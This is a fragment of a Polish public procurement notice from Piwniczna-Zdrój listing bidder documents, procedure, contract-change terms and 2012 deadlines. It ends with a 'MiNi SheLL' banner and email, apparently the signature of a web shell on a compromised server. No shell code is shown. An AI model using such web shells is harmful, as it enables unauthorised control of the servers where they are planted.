<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. Na ofertę składają się następujące dokumenty i załączniki:
A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę
A.2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych.
A.3) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych
A.4) Wykaz osób do kontaktow z zamawiającym
A.5) Wzór umowy 
A.6) Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.
A.7) Formularz cenowy - wypełniony i podpisany przez wykonawcę
A.8)Inne dokumenty - zgodnie z SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.W związku z brzmieniem art.144 ustawy, Zamawiający przewiduje następujące możliwości dokonania  zmiany niniejszej umowy:
1)	w zakresie przedmiotu zamówienia,  których nie dało się  przewidzieć w chwili podpisania umowy, a w szczególności:
a)	w sytuacji pojawienia się na rynku nowych rozwiązań technologicznych                                      i materiałowych
b)	zmiana terminów wykonania robót, zwłaszcza gdy dotrzymanie terminu wskazanego pierwotnie  okazało się niemożliwe z powodów, za które nie ponosi odpowiedzialności Wykonawca
2)	w zakresie zmniejszenie wynagrodzenia ,zwłaszcza w sytuacji zmniejszenia zakresu robót,
w zakresie terminów realizacji - jeżeli pojawiły się okoliczności. których nie można było przewidzieć                w chwili zawierania umowy, zwłaszcza w przypadku wystąpienia potrzeby realizacji robót dodatkowych.
3)	w zakresie zmniejszenia lub zwiększenia wynagrodzenia w zawiązku ze zmianą stawki VAT           w zakresie przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.piwniczna.pl baner BIP link Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd miasta i Gminy Piwniczna-Zdrój
33-350 Piwniczna-Zdrój, ul.Rynek 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy Piwniczna-Zdrój
33-350 Piwniczna-Zdrój, ul.Rynek 20
Pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 06.10.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach programu rządowego Radosna Szkoła  zgodnie z uchwałą Nr 112)2009 z dnia       7 lipca 2009 r. i Rozporządzeniem Rady Ministrów z dnia 7 lipca 2009 r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com